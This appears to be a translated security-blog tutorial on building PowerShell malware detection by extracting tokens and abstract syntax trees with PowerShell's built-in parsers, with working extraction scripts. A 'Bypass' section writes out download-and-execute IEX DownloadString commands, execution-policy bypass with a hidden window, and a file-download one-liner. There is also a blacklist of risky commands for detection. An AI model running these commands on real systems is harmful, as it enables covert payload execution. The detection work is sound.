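[Network Security Advanced Series] 115. PowerShell Malicious Code Detection (3): Automatic Token Keyword Extraction

The "Network Security Advanced Class" is about to start a new run of 100 articles covering web penetration, intranet penetration, lab range setup, CVE reproduction, attack attribution, hands-on practice, and CTF write-ups. It will be more focused and go deeper, and it also records the author's slow growth. Switching fields is hard, and web penetration is a tough nut to crack, but I will give it a try and see how far I can take it over the next four years. Enjoy the process, and let's keep at it together.

The previous article briefly introduced how to extract abstract syntax trees through the officially provided interface, including AST visualization and node extraction. This article covers in detail how to extract tokens, the fields in PowerShell that carry a specific meaning, again mainly through the officially provided interface. I hope you find it useful, and I also recommend reading the related papers.

As a newcomer to network security, the author shares some self-study tutorials, mostly online notes on security tools and hands-on practice. Better still, follow along and improve with me; later articles will dig deeper into network and system security and share related experiments. Writing takes effort, so experts, please be kind if it is not to your taste. If the article helps you, that is my biggest motivation to keep writing; likes, comments, and private messages are all welcome.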

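Self-study tools: https://github.com/eastmountyxz/NetworkSecuritySelf-study
System security: https://github.com/eastmountyxz/SystemSecurity-ReverseAnalysis

Disclaimer: I firmly oppose using these teaching methods to commit crimes. All criminal acts will be severely punished. A clean network needs all of us to maintain it, and I recommend understanding the principles behind these techniques so that you can defend against them better.

Advanced series: (the table of contents of the 100-article self-study series is at the end of the article)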

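I. PowerShell Basics

1. High Threat

In recent years, PowerShell has been widely used in APT attacks because it is easy to use and highly stealthy. Traditional malicious code detection based on manual feature extraction and machine learning is becoming less and less effective against malicious PowerShell code.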

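Microsoft's PowerShell is a command-line shell and scripting language installed by default on Windows machines. It is built on Microsoft's .NET framework and includes an interface that lets programmers access operating system services. Administrators can configure PowerShell to restrict access and reduce vulnerabilities, but these restrictions can be bypassed. In addition, PowerShell commands can easily be generated dynamically, executed from memory, encoded, and obfuscated, which makes logging and forensic analysis of code executed by PowerShell challenging.

For these reasons, cybercriminals increasingly use PowerShell as part of their attack toolchain, mainly to download malicious content and to move laterally. A comprehensive technical report from Symantec on PowerShell abuse by cybercriminals noted a sharp increase in the number of malicious PowerShell samples they received and in the number of penetration tools and frameworks that use PowerShell. This highlights the urgent need for effective methods of detecting malicious PowerShell commands.

2. Basic Syntax

In penetration testing, PowerShell is a link that cannot be ignored, and it is still being updated and developed. It is flexible and offers functional management of Windows systems. Once attackers can run code on a machine, they can download a PowerShell script file (.ps1) to disk and execute it, or run it directly in memory without ever writing it to disk.

These traits make PowerShell a preferred means for attackers to gain and keep access to a system; by exploiting them, attackers can keep attacking without being easily discovered. Commonly used PowerShell attack tools include the following.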

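PowerSploit
A widely used PowerShell post-exploitation framework, commonly used for information gathering, privilege escalation, credential theft, and persistence.
Nishang
A PowerShell-based penetration testing tool that bundles frameworks, scripts, and various payloads, including scripts for download-and-execute, keylogging, DNS, and delayed commands.
Empire
A PowerShell-based remote-control trojan that can export and track credential information from credential databases. It commonly provides integrated modules for early-stage exploitation, information gathering, credential theft, and persistent control.
PowerCat
The PowerShell version of NetCat, known as the "Swiss Army knife" of network tools. It reads and writes data across the network over TCP and UDP, and combined with other tools and redirection it can be used in scripts in many ways.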

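In PowerShell, the counterpart of a "cmd command" is called a "cmdlet". Cmdlet names are quite consistent and follow a "verb-noun" form such as New-Item; the verb is usually Add, New, Get, Remove, Set, and so on. Aliases are generally compatible with Windows Command and Linux Shell; for example, Get-ChildItem can also be invoked as dir or ls. PowerShell commands are case-insensitive.

The following file operations illustrate basic PowerShell command usage.

Create a directory: New-Item whitecellclub -ItemType Directory
Create a file: New-Item light.txt -ItemType File
Remove a directory: Remove-Item whitecellclub
Show file content: Get-Content test.txt
Set file content: Set-Content test.txt -Value "hello,world!"
Append content: Add-Content light.txt -Value "i love you"
Clear content: Clear-Content test.txt

A simple example: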

New-Item test -ItemType directory
Remove-Item test
New-Item eastmount.txt -ItemType file -value "hello csdn"  

Get-Content eastmount.txt
Add-Content eastmount.txt -Value " bye!"
Get-Content eastmount.txt 

Set-Content eastmount.txt -Value "haha"
Get-Content eastmount.txt
Clear-Content eastmount.txt
Get-Content eastmount.txt
Remove-Item eastmount.txt
Get-Content eastmount.txt

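3. Bypass

In testing, a downloaded PowerShell script can be run directly from a cmd window regardless of the current policy. To run a script from a PowerShell window, however, administrator rights are needed to change the Restricted policy to Unrestricted, so during a penetration test some method of bypassing the policy is needed to execute scripts.

(1) Download a remote PowerShell script and bypass the policy to execute it
Call the DownloadString function to download the remote ps1 script file.

// run the following command in a cmd window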
powershell -c IEX (New-Object System.Net.Webclient).DownloadString('http://192.168.10.11/test.ps1')

// run in a PowerShell window
IEX (New-Object System.Net.Webclient).DownloadString('http://192.168.10.11/test.ps1')

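Switch to a CMD window to run it (the original screenshot is credited to Xie Gongzi).

(2) Bypass the local policy
Upload xxx.ps1 to the target server and execute it locally on the target server from CMD, as shown below.

PowerShell.exe -ExecutionPolicy Bypass -File xxx.ps1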

powershell -exec bypass  .\test.ps1

(3) Bypass the policy and run a local script with a hidden window

PowerShell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoLogo
-NonInteractive -NoProfile -File xxx.ps1

For example:

powershell.exe -exec bypass -W hidden -nop test.ps1

(4) Use IEX to download a remote PS1 script and bypass the policy

PowerShell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile
-NonI IEX(New-Object Net.WebClient).DownloadString("xxx.ps1");[Parameters]

Function definition:

function Test-MrParameter {

    param (
        [string]$ComputerName
    )

    Write-Output $ComputerName
	Write-Output ($ComputerName+$ComputerName)
	Write-Output ($ComputerName+$ComputerName+$ComputerName)
}

Inspect and call the function:

Get-Command -Name Test-MrParameter -Syntax
Test-MrParameter -ComputerName 'this is a computer name'
pause

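Output:

Test-MrParameter [[-ComputerName] <string>]

this is a computer name
this is a computer namethis is a computer name
this is a computer namethis is a computer namethis is a computer name
Press Enter to continue...: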

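II. powershell.one

The PowerShell abstract syntax tree is a semantic representation of the code. It expresses the logical structure of a script's functionality as a multi-way tree, preserves the contextual features of the code, and removes interference from irrelevant parameters, which makes it an effective way to analyze functionally similar PowerShell code. ASTs are commonly obtained either through an existing interface or with a custom program. The previous article covered the first approach; this article covers the officially provided interface.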

Deobshell
https://github.com/thewhiteninja/deobshell
powershell.one => Convert-CodeToAst
https://powershell.one/powershell-internals/parsing-and-tokenization/abstract-syntax-tree#ast-object-inheritance

Windows provides PowerShell with a built-in interface for accessing a script's AST.

The Abstract Syntax Tree (AST) groups tokens into meaningful structures and is the most sophisticated way of analyzing PowerShell code.

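1. Concept

The PowerShell parser turns individual characters into meaningful keywords and distinguishes, for example, commands, parameters, and variables. This is called tokenization and was covered earlier. Editors, for instance, use these tokens to colorize code and show variables in a different color from commands.

The parser does not stop there. To execute code, PowerShell needs to know how the individual tokens form structures that can be executed. The parser takes the tokens and builds an abstract syntax tree (AST), which essentially groups tokens into meaningful structures.

The abstract syntax tree is called a tree because it works like a hierarchical tree. PowerShell starts with the first token and then uses the PowerShell language definition (the grammar) to determine what the next token can be. In this way the parser works its way through the code.

Case 1: PowerShell succeeds and creates a valid structure for the code
Case 2: the parser runs into a syntax error and raises it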

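2. Accessing the AST

Starting with PowerShell 3, the abstract syntax tree is exposed to you, so you can analyze PowerShell code and understand its internal structure. There are two main ways to access the AST:

ScriptBlock: a scriptblock is a valid block of PowerShell code, so it has already been processed by the parser, and the parser guarantees that the code contains no syntax errors. Every scriptblock has a property named Ast that exposes the abstract syntax tree of the code it contains.
Parser: you can ask the PowerShell parser to parse arbitrary code and return the tokens and the AST. You are essentially mimicking what PowerShell does when you enter and run code. Because the parser works on raw text, there is no guarantee that the code is syntactically correct, which is why the parser also returns any syntax errors it finds.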
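
The two access paths can be compared side by side. The following is a minimal sketch, not taken from the original article: the sample command string and the variable names ($source, $viaScriptBlock, $viaParser) are made up for illustration.

```powershell
# Hypothetical sample code, used only for illustration.
$source = 'Get-Service | Where-Object Status -eq Running'

# Way 1: a scriptblock exposes its already-parsed AST through the Ast property.
$viaScriptBlock = [ScriptBlock]::Create($source).Ast

# Way 2: the parser accepts raw text and also hands back tokens and errors.
$tokens = $null
$errors = $null
$viaParser = [System.Management.Automation.Language.Parser]::ParseInput($source, [ref]$tokens, [ref]$errors)

# Both paths yield the same kind of root node.
$viaScriptBlock.GetType().Name
$viaParser.GetType().Name

# The parser path additionally reports how many syntax errors it found.
$errors.Count
```

For syntactically valid input both roots are ScriptBlockAst objects and the error collection is empty; the difference only shows up with broken code, where the scriptblock cannot be created at all.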

A simple example of viewing the abstract syntax tree (AST) that the parser built:

$code = { "Hello" * 10 }
$code.Invoke()
$code.Ast

This can be used to create a simple test function that checks whether a string is valid PowerShell code:

function Test-PowerShellCode
{
    param
    (
        [string]
        $Code
    )

    try
    {
        # try and convert string to scriptblock:
        $null = [ScriptBlock]::Create($Code)
    }
    catch
    {
        # the parser is invoked implicitly and returns
        # syntax errors as exceptions:
        $_.Exception.InnerException.Errors
    }
}

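The abstract syntax tree (AST) is a tree of Ast objects. The top of this tree is what the parser returns to you. Every Ast object you encounter while traversing the tree has a Parent and an Extent property. Parent defines the tree relationship, and Extent defines the PowerShell code that the Ast object covers.

Common methods: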

Name                   Signature
----                   ---------
Copy                   System.Management.Automation.Language.Ast Copy()
Find                   System.Management.Automation.Language.Ast Find(System.Func[System.Management.Automation.Language.Ast,bool] predicate, bool searchNestedScriptBlocks)
FindAll                System.Collections.Generic.IEnumerable[System.Management.Automation.Language.Ast] FindAll(System.Func[System.Management.Automation.Language.Ast,bool] predicate, b...
Visit                  System.Object Visit(System.Management.Automation.Language.ICustomAstVisitor astVisitor), void Visit(System.Management.Automation.Language.AstVisitor astVisitor)
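
As a small illustration of FindAll together with the Parent and Extent properties, the sketch below collects all command nodes of a scriptblock. The sample scriptblock and the names $isCommand and $commands are assumptions chosen for this example.

```powershell
# Hypothetical sample scriptblock.
$code = { Get-Service | Where-Object Status -eq Running }

# Predicate: keep only nodes that represent a command invocation.
$isCommand = { param($node) $node -is [System.Management.Automation.Language.CommandAst] }

# The second argument ($true) also searches nested scriptblocks.
$commands = $code.Ast.FindAll($isCommand, $true)

foreach ($cmd in $commands) {
    # Extent.Text is the source text the node covers; Parent is the enclosing node.
    '{0} | parent: {1} | text: {2}' -f $cmd.GetCommandName(), $cmd.Parent.GetType().Name, $cmd.Extent.Text
}
```

Find works the same way but stops at the first match, which is handy when only the existence of a node type matters.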

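III. Tokenizing PowerShell Scripts

By turning PowerShell code into tokens and structures, you can find errors, document your code automatically, and build powerful refactoring tools.

https://powershell.one/powershell-internals/parsing-and-tokenization/simple-tokenizer

1. The Colorful World of Tokens

Whenever you load PowerShell code into a specialized editor such as VS Code, the code is magically colorized, and each color stands for a given token type. The colors help you understand how PowerShell interprets your code.

Generic editors without a built-in PowerShell engine (such as Notepad++ or VS Code) use complex regular expressions to try to identify tokens correctly. If you want tokens that are 100% accurate, you can use the PowerShell parser directly instead of generic regex rules. This article looks at the advantages of the PowerShell parser.

Token: this article treats a token as a key field. The parser automatically determines the meaning of each one, such as a variable definition, a function, or a keyword.

Next you get a new command: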

Test-PSOneScript

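It parses one or thousands of PowerShell files and immediately returns 100% accurate tokens. It is part of the PSOneTools module, so install the latest version to use the command, or use the source code provided below.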

Install-Module -Name PSOneTools -Scope CurrentUser -Force

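Once you have the tokens, you can do many interesting things, for example:

Document code automatically and create lists of the variables, commands, or method calls found in a script
Identify syntax errors that make the parser choke
Perform security analysis and identify scripts that use risky commands

2. PSParser Overview

PSParser is the original parser built into early versions of PowerShell. Although it is old, it is still part of every PowerShell version and is very useful because of its simplicity.

It distinguishes 20 different token types: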

PS> [Enum]::GetNames([System.Management.Automation.PSTokenType]).Count
20

PS> [Enum]::GetNames([System.Management.Automation.PSTokenType]) | Sort-Object
Attribute
Command
CommandArgument
CommandParameter
Comment
GroupEnd
GroupStart
Keyword
LineContinuation
LoopLabel
Member
NewLine
Number
Operator
Position
StatementSeparator
String
Type
Unknown
Variable

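When you tokenize PowerShell code with PSParser, it reads your code character by character and groups the characters into meaningful words, the tokens. If PSParser encounters a character it does not expect, it generates a syntax error, for example when a string starts with a double quote but ends with a single quote.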
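
The mismatched-quote case can be reproduced with a few lines. This is a minimal sketch; the broken input string and the variable name $broken are made up for illustration.

```powershell
# Hypothetical broken input: the string opens with a double quote
# but "closes" with a single quote, so it is never terminated.
$broken = '$text = "Hello' + "'"

# Tokenize() fills $errors by reference with any syntax errors it finds.
$errors = $null
$tokens = [System.Management.Automation.PSParser]::Tokenize($broken, [ref]$errors)

# Number of syntax errors, followed by their messages.
$errors.Count
$errors | ForEach-Object { $_.Message }
```

The exact wording of the message depends on the PowerShell version and UI language, so it is better to test for $errors.Count than to match on the text.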

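3. Tokenizing PowerShell

Use Tokenize() to tokenize PowerShell code. Here is a simple example, assuming the code is saved as "get_token_001.ps1".

Tokenize() expects the code you want tokenized plus an empty variable that it can fill with any syntax errors. Because the variable $errors is empty when Tokenize() starts and is filled while the method parses the code, it has to be passed by reference (memory pointer), which PowerShell does with [ref].

When Tokenize() finishes, you receive all tokens as the return value in $tokens and any syntax errors in $errors.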

$tokens = [System.Management.Automation.PSParser]::Tokenize($code, [ref]$errors)
$syntaxError = $errors | Select-Object -ExpandProperty Token -Property Message

The full code:

# the code that you want tokenized:
$code = {
  # this is some test code
  $service = Get-Service |
    Where-Object Status -eq Running
}


# create a variable to receive syntax errors:
$errors = $null
# tokenize PowerShell code:
$tokens = [System.Management.Automation.PSParser]::Tokenize($code, [ref]$errors)

# analyze errors:
if ($errors.Count -gt 0)
{
  # move the nested token up one level so we see all properties:
  $syntaxError = $errors | Select-Object -ExpandProperty Token -Property Message
  $syntaxError
}
else
{
  $tokens
}

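In the output, each token is represented by a PSToken object that returns the token content as a string, the token type, and the exact position where the token was found.

Comment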

Content     : # this is some test code
Type        : Comment
Start       : 4
Length      : 24
StartLine   : 2
StartColumn : 3
EndLine     : 2
EndColumn   : 27

Variable

Content     : service
Type        : Variable
Start       : 32
Length      : 8
StartLine   : 3
StartColumn : 3
EndLine     : 3
EndColumn   : 11

Operator

Content     : =
Type        : Operator
Start       : 41
Length      : 1
StartLine   : 3
StartColumn : 12
EndLine     : 3
EndColumn   : 13

Command

Content     : Get-Service
Type        : Command
Start       : 43
Length      : 11
StartLine   : 3
StartColumn : 14
EndLine     : 3
EndColumn   : 25

Content     : Where-Object
Type        : Command
Start       : 62
Length      : 12
StartLine   : 4
StartColumn : 5
EndLine     : 4
EndColumn   : 17

Command arguments

Content     : Status
Type        : CommandArgument
Start       : 75
Length      : 6
StartLine   : 4
StartColumn : 18
EndLine     : 4
EndColumn   : 24

Content     : Running
Type        : CommandArgument
Start       : 86
Length      : 7
StartLine   : 4
StartColumn : 29
EndLine     : 4
EndColumn   : 36
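
The Start and Length properties shown above can be used to cut the original source text of a token out of the script. The sketch below assumes a one-line sample script; the property name Source in the output object is made up for this example.

```powershell
# Hypothetical one-line sample script.
$code = '$service = Get-Service | Where-Object Status -eq Running'

$errors = $null
$tokens = [System.Management.Automation.PSParser]::Tokenize($code, [ref]$errors)

foreach ($t in $tokens) {
    [PSCustomObject]@{
        Type    = $t.Type
        Content = $t.Content
        # Start is a zero-based offset into the script text.
        Source  = $code.Substring($t.Start, $t.Length)
    }
}
```

For the variable token, Content is service while the sliced source text is $service, which matches the Length of 8 in the listing above: Content drops the leading dollar sign, but the position data still covers it.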

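If the parser hits an unexpected character while parsing, it generates a syntax error. The parser keeps parsing, so it may return several syntax errors. For each syntax error the parser emits a PSParseError object.

IV. Token Extraction Examples

To check real file-based scripts, embed the logic above in a pipeline-aware function. Test-PSOneScript does exactly that and makes parsing PowerShell files easy: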

function Test-PSOneScript
{
  <#
      .SYNOPSIS
      Parses a PowerShell Script (*.ps1, *.psm1, *.psd1)

      .DESCRIPTION
      Invokes the simple PSParser and returns tokens and syntax errors

      .EXAMPLE
      Test-PSOneScript -Path c:\test.ps1
      Parses the content of c:\test.ps1 and returns tokens and syntax errors

      .EXAMPLE
      Get-ChildItem -Path $home -Recurse -Include *.ps1,*.psm1,*.psd1 -File |
         Test-PSOneScript |
         Out-GridView

      parses all PowerShell files found anywhere in your user profile

      .EXAMPLE
      Get-ChildItem -Path $home -Recurse -Include *.ps1,*.psm1,*.psd1 -File |
         Test-PSOneScript |
         Where-Object Errors

      parses all PowerShell files found anywhere in your user profile
      and returns only those files that contain syntax errors

      .LINK
      https://powershell.one
  #>

  param
  (
    # Path to PowerShell script file
    # can be a string or any object that has a "Path" 
    # or "FullName" property:
    [String]
    [Parameter(Mandatory,ValueFromPipeline)]
    [Alias('FullName')]
    $Path
  )
  
  begin
  {
    $errors = $null
  }
  process
  {
    # create a variable to receive syntax errors:
    $errors = $null
    # tokenize PowerShell code:
    $code = Get-Content -Path $Path -Raw -Encoding Default
    
    # return the results as a custom object
    [PSCustomObject]@{
      Name = Split-Path -Path $Path -Leaf
      Path = $Path
      Tokens = [Management.Automation.PSParser]::Tokenize($code, [ref]$errors)
      Errors = $errors | Select-Object -ExpandProperty Token -Property Message
    }  
  }
}

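Since this article focuses on extracting tokens from PowerShell files, readers interested in syntax checking should consult the official website.

1. Basic Usage

To parse a single file, pass its path to Test-PSOneScript; it immediately returns the tokens and any syntax errors.

$Path = "C:\Users\tobia\test.ps1"
$result = Test-PSOneScript -Path $Path

This article parses the file "data\example-004.ps1", whose PowerShell content is:

$service = Get-Service | Where-Object Status -eq Running

(1) Extracting the AST

First, here is the abstract syntax tree (AST) extraction code from the previous article.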

function Convert-CodeToAst
{
  param
  (
    [Parameter(Mandatory)]   # mandatory parameter
    [System.String]$str      # path of the ps1 file to parse
  )

  # hashtable that maps a parent id to its child nodes
  $hierarchy = @{}
  $result = [System.Collections.ArrayList]@()

  # read the ps1 file; -Raw keeps multi-line scripts as one string
  Write-Output ("file name: {0}" -f ($str))
  $content = Get-Content $str -Raw
  Write-Output $content

  # create the scriptblock
  $code = [ScriptBlock]::Create($content)

  # extract the AST
  $code.Ast.FindAll( { $true }, $true) |
  ForEach-Object {
    # take unique object hash as key
    $id = 0;
    if($_.Parent) {
      $id = $_.Parent.GetHashCode()
    }
    Write-Debug('{0}:{1}' -f $_.GetType().Name,$id)

    if ($hierarchy.ContainsKey($id) -eq $false) {
      $hierarchy[$id] = [System.Collections.ArrayList]@()
    }
    $null = $hierarchy[$id].Add($_)
    # add ast object to parent
  }
  
  # visualize the tree recursively
  function Visualize-Tree($Id, $Indent = 0)
  {
    # indentation per level
    $space = '--' * $indent
    $hierarchy[$id] | ForEach-Object {
      # output the AST object
      '{0}[{1}]: {2}' -f $space, $_.GetType().Name, $_.Extent
    
      # get the id of the current AST object
      $newid = $_.GetHashCode()
      # recurse into its child nodes (if any)
      if ($hierarchy.ContainsKey($newid)) {
        Visualize-Tree -id $newid -indent ($indent + 1)
      }
    }
  }

  # start the visualization at the AST root object
  Visualize-Tree -id $code.Ast.GetHashCode()
  return $result
}

Convert-CodeToAst -str .\data\example-004.ps1

(2) Extracting Tokens

The code for extracting the tokens of a single file is as follows:

# Test-PSOneScript is the function defined at the start of this section.
# This run adds one line right after Get-Content to echo the script text:
#   Write-Output $code

# Run the function
$Path = ".\data\example-004.ps1"
$result = Test-PSOneScript -Path $Path
$errors = $result.Errors.Count -gt 0
$tokens = $result.Tokens.Type | Sort-Object -Unique

# Print the results
Write-Output ($result)
Write-Output ($errors,"`n")
Write-Output ($tokens)

The core code for checking whether the script file has syntax errors:

$result.Errors.Count -gt 0
False

The core code for listing all token types that occur in the script:

$result.Tokens.Type | Sort-Object -Unique

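(3) Extracting Variable and Command Lists

To list all variables used in a script, filter for the token type Variable. Likewise, to list the commands a script uses, filter for the token type Command.

# Run the function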
$Path = ".\data\example-004.ps1"
$result = Test-PSOneScript -Path $Path
$errors = $result.Errors.Count -gt 0
$tokens = $result.Tokens.Type | Sort-Object -Unique
Write-Output ($result)
Write-Output ($errors,"`n")
Write-Output ($tokens,"`n")

# Extract the list of variables
$variables = $result.Tokens | 
  Where-Object Type -eq Variable | 
  Sort-Object -Property Content -Unique | 
  ForEach-Object { '${0}' -f $_.Content}
Write-Output ("Get Variables:")
Write-Output ($variables,"`n")

# Extract the list of commands
$commands = $result.Tokens | 
  Where-Object Type -eq Command | 
  Sort-Object -Property Content -Unique | 
  Select-Object -ExpandProperty Content
Write-Output ("Get Commands:")
Write-Output ($commands,"`n")

# Extract the list of .NET members
$members = $result.Tokens | 
  Where-Object Type -eq Member | 
  Select-Object -ExpandProperty Content |
  Sort-Object -Unique
Write-Output ("Get Members:")
Write-Output ($members,"`n")

You can even analyze how often commands are used. The following gives you the 10 most frequently used commands.

PS> $result.Tokens | 
  Where-Object Type -eq Command | 
  Select-Object -ExpandProperty Content |
  Group-Object -NoElement |
  Sort-Object -Property Count -Descending |
  Select-Object -First 10

Count Name                     
----- ----                     
   51 Search-AD                
   49 New-Object               
   35 Write-Verbose            
   29 get-date                 
   25 %                        
   24 New-TimeSpan             
   24 Where                    
   21 select                   
   19 Sort-Object              
   17 Invoke-Method

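2. Batch Analysis

Test-PSOneScript is not limited to checking one file at a time. It fully supports the pipeline and knows how to handle the output of Get-ChildItem.

(1) Finding scripts with errors
To identify scripts with syntax errors anywhere in your script library, run Get-ChildItem to collect the files to test and pipe them to Test-PSOneScript, as follows: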

# get all PowerShell files from your user profile...
Get-ChildItem -Path $home -Recurse -Include *.ps1, *.psd1, *.psm1 -File |
  # ...parse them...
  Test-PSOneScript |
  # ...filter those with syntax errors...
  Where-Object Errors |
  # ...expose the errors:
  ForEach-Object {
    [PSCustomObject]@{
      Name = $_.Name
      Error = $_.Errors[0].Message
      Type = $_.Errors[0].Type
      Line = $_.Errors[0].StartLine
      Column = $_.Errors[0].StartColumn
      Path = $_.Path
    }
  }

(2) Identifying risky commands
To identify scripts that use risky commands such as Invoke-Expression, adjust the filter.

$blacklist = @('Invoke-Expression', 'Stop-Computer', 'Restart-Computer')


# get all PowerShell files from your user profile...
Get-ChildItem -Path $home -Recurse -Include *.ps1, *.psd1, *.psm1 -File |
# ...parse them...
Test-PSOneScript |
# ...filter those using commands in our blacklist
Foreach-Object {
  # get the first token that is a command and that is in our blacklist
  $badToken = $_.Tokens.Where{$_.Type -eq 'Command'}.Where{$_.Content -in $blacklist} | 
    Select-Object -First 1
  
  if ($badToken)
  {
    $_ | Add-Member -MemberType NoteProperty -Name BadToken -Value $badToken -PassThru
  }
  } |
  # ...expose the errors:
  ForEach-Object {
    [PSCustomObject]@{
      Name = $_.Name
      Offender = $_.BadToken.Content
      Line = $_.BadToken.StartLine
      Column = $_.BadToken.StartColumn
      Path = $_.Path
    }
  }
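
One limitation of a name-based blacklist is that a script can call a risky command through an alias such as iex. The sketch below resolves aliases before the comparison. Resolve-CommandName is a hypothetical helper written for this example, not part of PSOneTools, and the sample command line is made up.

```powershell
$blacklist = @('Invoke-Expression', 'Stop-Computer', 'Restart-Computer')

# Hypothetical helper: map an alias to the command it points to,
# or return the name unchanged when it is not an alias.
function Resolve-CommandName
{
  param([string]$Name)

  # escape wildcard characters so names like % or ? are matched literally
  $pattern = [System.Management.Automation.WildcardPattern]::Escape($Name)
  $alias = Get-Alias -Name $pattern -ErrorAction SilentlyContinue |
    Select-Object -First 1

  if ($alias) { $alias.Definition } else { $Name }
}

# Hypothetical sample line that hides Invoke-Expression behind its alias.
$code = 'iex (Get-Content .\payload.txt -Raw)'
$errors = $null
$tokens = [System.Management.Automation.PSParser]::Tokenize($code, [ref]$errors)

# Resolve every command token, then keep only blacklisted names.
$hits = $tokens |
  Where-Object { $_.Type -eq 'Command' } |
  ForEach-Object { Resolve-CommandName -Name $_.Content } |
  Where-Object { $_ -in $blacklist }

$hits
```

This only covers aliases known to the session that runs the analysis. Obfuscated calls, for example a command name assembled from strings at run time, still need AST-level or dynamic analysis.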

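3. Extracting the Text of Each Token

Part 3 of Section III showed an example that uses the PSToken class to obtain token content; its properties can be accessed directly. Next, we extract the text that corresponds to each token.

The full code:
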
# Function: extract token content
# Test-PSOneScript is reused unchanged from the token-extraction example above
# (including the added Write-Output $code line).

# Run the function
$Path = ".\data\example-004.ps1"
$result = Test-PSOneScript -Path $Path
$errors = $result.Errors.Count -gt 0
$tokens = $result.Tokens.Type | Sort-Object -Unique
Write-Output ($result)
Write-Output ($errors,"`n")
Write-Output ($tokens,"`n")

# Extract the list of variables
$variables = $result.Tokens | 
  Where-Object Type -eq Variable | 
  Sort-Object -Property Content -Unique | 
  ForEach-Object { '${0}' -f $_.Content}
Write-Output ("Get Variables:")
Write-Output ($variables,"`n")

# Extract the list of commands
$commands = $result.Tokens | 
  Where-Object Type -eq Command | 
  Sort-Object -Property Content -Unique | 
  Select-Object -ExpandProperty Content
Write-Output ("Get Commands:")
Write-Output ($commands,"`n")

# Extract the token content
$token_texts = $result.Tokens.Content
Write-Output ($token_texts.GetType())
$strToken = ''
foreach($elem in $token_texts) {
  $elem = $elem | Out-String   # convert the object to a string
  $text = $elem.Trim()
  if($strToken.Length -ne 0) {  # not the first token: prepend a space
    $text = " " + $text
  }
  $strToken = $strToken + $text
}
Write-Output ("Get Texts:")
Write-Output ($strToken,$strToken.Length)

The extracted tokens are joined with spaces, for example:

service = Get-Service | Where-Object Status -eq Running
powershell ( new-object system.net.webclient ) . downloadfile ( http://192.168.10.11/test.exe , test.exe ) ;
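
The same space-joined string can also be built with the -join operator instead of an explicit loop. This is a minimal sketch of an equivalent formulation, assuming the one-line sample script from this section is passed in as a string.

```powershell
# Sample script text (the content of data\example-004.ps1 in this article).
$code = '$service = Get-Service | Where-Object Status -eq Running'

$errors = $null
$tokens = [System.Management.Automation.PSParser]::Tokenize($code, [ref]$errors)

# Trim each token's content and join everything with single spaces.
$strToken = ($tokens | ForEach-Object { "$($_.Content)".Trim() }) -join ' '

$strToken
```

The result is the first example line shown above, with the dollar sign of the variable dropped because PSToken.Content does not include it.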

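V. Automatically Extracting the AST and Tokens of PowerShell Code

Finally, building on the previous article, the author reads code from a CSV file and extracts its AST and tokens. The CSV file has the columns "no", "decoded code", and "family name", which the script below reads.

The full code: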

#------------------------------------------------------
# Part 1: read the file in batch
# By: Eastmount CSDN 2022-03-12
#------------------------------------------------------
function Read_csv_powershell 
{
  param (
    [parameter(Mandatory=$true)]
    [System.String]$inputfile,
    [System.String]$outputfile
  )

  # read the CSV file
  $content = Import-CSV $inputfile
  $list = [System.Collections.ArrayList]@()
  foreach($line in $content) {
    $no = $line.("no")
    $code = $line.("decoded code")
    $name = $line.("family name")
    # Write-Output($no, $code, $name)

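    # convert the code to its abstract syntax tree (AST) and tokens
    try {
      $ast = Convert-CodeToAst -str $code
      Write-Output($ast)
      $token = get_token_text -str $code
      Write-Output($token)
    } 
    catch [System.Exception] {
      'exception info:{0}' -f $_.Exception.Message
      continue
    }
    # discard the index returned by Add() so it does not pollute the output
    $null = $list.Add([PSCustomObject]@{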
      no = $no
      code = $code
      name = $name
      ast = $ast
      token = $token
    })
  }
  $list | ConvertTo-Csv -NoTypeInformation | out-file $outputfile -Encoding ascii -Force
  Write-Output($list)
}

#------------------------------------------------------
# Part 2: extract and join the AST node names
#------------------------------------------------------
function add_blanks 
{
    param (
      [parameter(Mandatory=$true)]
      [System.Array]$arr
    )
    $strNode = ''
    foreach($elem in $arr) {
        if($strNode.Length -ne 0) { # not the first element: prepend a space
            $elem = " " + $elem
        }
        $strNode = $strNode + $elem
    }
    return $strNode
}

# Function: extract the abstract syntax tree (AST) of PowerShell code
function Convert-CodeToAst
{
  param
  (
    [Parameter(Mandatory)]   # mandatory parameter
    [System.String]$str      # PowerShell code to parse
  )

  # hashtable that maps a parent id to its child nodes
  $hierarchy = @{}
  $result = [System.Collections.ArrayList]@()

  # create the scriptblock
  $code = [ScriptBlock]::Create($str)

  # extract the AST
  $code.Ast.FindAll( { $true }, $true) |
  ForEach-Object {
    # take unique object hash as key
    $id = 0;
    if($_.Parent) {
      $id = $_.Parent.GetHashCode()
    }
    Write-Debug('{0}:{1}' -f $_.GetType().Name,$id)

    if ($hierarchy.ContainsKey($id) -eq $false) {
      $hierarchy[$id] = [System.Collections.ArrayList]@()
    }
    $null = $hierarchy[$id].Add($_)
    # add ast object to parent
  }
  
  # walk the tree recursively
  function Visualize-Tree($Id)
  {
    # visit every child of the current node
    $hierarchy[$id] | ForEach-Object {
      # get the id of the current AST object
      $newid = $_.GetHashCode()

      # recurse into its child nodes (if any)
      if ($hierarchy.ContainsKey($newid))
      {
        Visualize-Tree -id $newid
      }
      # children are added first, so node names end up in post-order
      $null = $result.Add($_.GetType().Name)
    }
  }

  # start the traversal at the AST root object
  Visualize-Tree -id $code.Ast.GetHashCode()
  # Write-Output ($result,"`n")

  # join the node type names collected in $result
  $strNode = add_blanks -arr $result
  return $strNode
}

#------------------------------------------------------
# Part 3: extract and join the token content
#------------------------------------------------------
# Function: join the token content
function get_token_text 
{
  param (
    [Parameter(Mandatory)]   # mandatory parameter
    [System.String]$str      # PowerShell code to tokenize
  )

  # create the scriptblock
  $code = [ScriptBlock]::Create($str)

  # extract the tokens
  $errors = $null
  $tokens = [System.Management.Automation.PSParser]::Tokenize($code, [ref]$errors)
  $syntaxError = $errors | Select-Object -ExpandProperty Token -Property Message
  $token_texts = $tokens.Content
  # Write-Output ($token_texts)

  # join the strings
  $strToken = ''
  foreach($elem in $token_texts) {
    $elem = $elem | Out-String   # convert the object to a string
    $text = $elem.Trim()
    if($strToken.Length -ne 0) {  # not the first token: prepend a space
      $text = " " + $text
    }
    $strToken = $strToken + $text
  }
  # Write-Output ("Get Texts:")
  # Write-Output ($strToken,$strToken.Length)

  return $strToken
}

#------------------------------------------------------
# Main: read the CSV file and extract the AST and tokens
#------------------------------------------------------
$inputCSV = '.\data\data.csv'
$outputCSV = '.\data\data_AST_Token.csv'
Read_csv_powershell -inputfile $inputCSV -outputfile $outputCSV

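The script prints the results and also saves them to the local output file.

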